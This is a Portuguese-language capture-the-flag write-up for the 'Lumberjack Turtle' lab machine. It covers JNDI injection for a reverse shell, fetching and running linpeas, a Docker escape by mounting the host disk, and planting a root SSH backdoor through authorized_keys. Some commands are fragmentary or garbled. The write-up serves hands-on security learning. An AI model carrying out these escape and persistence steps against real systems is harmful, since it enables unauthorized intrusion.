Dificuldade - Média
Opa! parece que eu lembrei a senha do github... 🤥
A maquina dá vez é a Lumberjack Turtle
Pra começar a brincadeira primeiro a gente tem que descobrir com quem a gente ta brincando.
Apenas uma pagina simples com uma mensagem.
Não é porque a pagina é simples que acabou a enumeração.
"no logs, no crimes"
Bem alto explicativo o que vai acontecer daqui pra frente né ? �
Vamos baixar a ferramenta que vai gerar os Links JNDI que iremos injetar.
Uma site gerador de payloads reverse shell bem simples de ser usado é o reverse shell generator
para baixar o script na maquina use o comando
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
e em seguindabash. /linpeas.sh
Dando uma olhada no que o script me diz encontro uma seção afirmando que estou dentro de um container.
O SUID é definido para dar permissões temporárias para um usuário executar um programa ou arquivo com as permissões do proprietário do arquivo.
Dando uma estudadinha sobre Docker Escape no hacktryckz aprendemos que podemos montar e ter acesso aos arquivos do sistema hospedeiro.
Após criar uma pasta onde será criada o disco usando mkdir /mnt/host
vamos montar o sistema do hospedeiro.
Como temos acesso aos arquivos do hospedeiro podemos criar um "backdoor" adicionando nossa chave publica do ssh no arquivo authorized_keys dentro do pasta .ssh
dentro da pasta de usuário root
Para criar as chaves ssh use o comando
ssh-keygen
Para inserir a chave dentro do arquivo vamos utilizar o comandoecho "${Chave} >>> /root/.ssh/authorized_keys
Como não encontrei nada com o comando find vamos ao diretório do usuário root e usar o comando
ls -laR
. o -l lista as permissões. o -a lista todos arquivos inclusive os ocultos. o -R lista diretórios e subdiretórios recursivamente.